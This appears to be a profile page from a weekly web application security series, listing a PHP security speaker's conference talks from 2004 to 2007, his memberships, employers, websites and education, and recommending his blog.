PHP Security - OSCON (26 Jul 2004)

Foiling Cross-Site Attacks - OSCON (29 Jul 2004)

Securing PHP Sessions - OSCON (30 Jul 2004)

PHP Session Security - phpworks (23 Sep 2004)

Testing PHP with Perl - New York PHP (26 Oct 2004)

PHP Security - ApacheCon (14 Nov 2004)

Testing PHP with Perl - ApacheCon (16 Nov 2004)

PHP Security - PHP Quebec (30 Mar 2005)

PHP Security Briefing - PHP Quebec (01 Apr 2005)

PHP Security Briefing - NOAA SecCon (04 May 2005)

PHP Security by Example - phptropics (13 May 2005)

PHP Security Audit HOWTO - PHP West (11 Jun 2005)

PHP Security - ApacheCon Europe (19 Jul 2005)

PHP Security Briefing - ApacheCon Europe (21 Jul 2005)

Testing PHP with Perl - ApacheCon Europe (22 Jul 2005)

PHP Security - OSCON (01 Aug 2005)

PHP Security Briefing - OSCON (03 Aug 2005)

PHP by Example - phpworks (14 Sep 2005)

PHP Security by Example - phpworks (15 Sep 2005)

PHP Security Audit HOWTO - New York PHP (27 Sep 2005)

PHP Security Audit HOWTO - Boston PHP (06 Oct 2005)

PHP Security - ZendCon (18 Oct 2005)

PHP Security Audit HOWTO - ZendCon (21 Oct 2005)

Power PHP Testing - ApacheCon (11 Dec 2005)

Agile PHP Testing - PHP Quebec (31 Mar 2006)

What's New in PHP 5 - LinuxWorld (25 Apr 2006)

PHP Security - LinuxWorld (25 Apr 2006)

PHP Security - phptek (27 Apr 2006)

Zend Framework - Boston PHP (04 May 2006)

Essential PHP Security - ApacheCon Europe (27 Jun 2006)

The Truth about XSS - ApacheCon Europe (28 Jun 2006)

Agile PHP Testing - ApacheCon Europe (29 Jun 2006)

Power PHP Testing - OSCON (24 Jul 2006)

Essential PHP Security - OSCON (25 Jul 2006)

The Truth about XSS - OSCON (26 Jul 2006)

PHP Security Testing - OSCON (27 Jul 2006)

The Truth about XSS - phpworks (13 Sep 2006)

Agile PHP Testing - phpworks (13 Sep 2006)

PHP Security Audit HOWTO - EuroOSCON (21 Sep 2006)

PHP Security Testing - DC PHP Con (19 Oct 2006)

The Truth about XSS - DC PHP Con (19 Oct 2006)

Essential PHP Security - ZendCon (30 Oct 2006)

Security 2.0 - Web Builder 2.0 (05 Dec 2006)

The Truth about Sessions - PHP Quebec (15 Mar 2007)


Memberships:-

PHP Security Consortium (Founder)
http://phpsec.org/

Open Web Application Security Project
http://owasp.org/

Web Application Security Consortium
http://webappsec.org/


Companies worked for:-

USPS, eDonkey, Brain Bulb, OmniTI


Company working for:-

OmniTI (Principal)
http://omniti.com/


Email:-

http://shiflett.org/contact


Blog:-

http://shiflett.org/


Websites:-

Personal -

http://shiflett.org/

Work -

Omni TI
http://omniti.com/

PHP Security Consortium
http://phpsec.org/

Essential PHP Security
http://phpsecurity.org/


Education:-

BS in Computer Science


If you haven’t been to his blog yet, then I would strongly recommend visiting it sooner as you will find plethora of information on webappsec. Every webappsec enthusiast should have it on their watchlist.

Last Week - Jeff Willians
Next Week - Ory Segal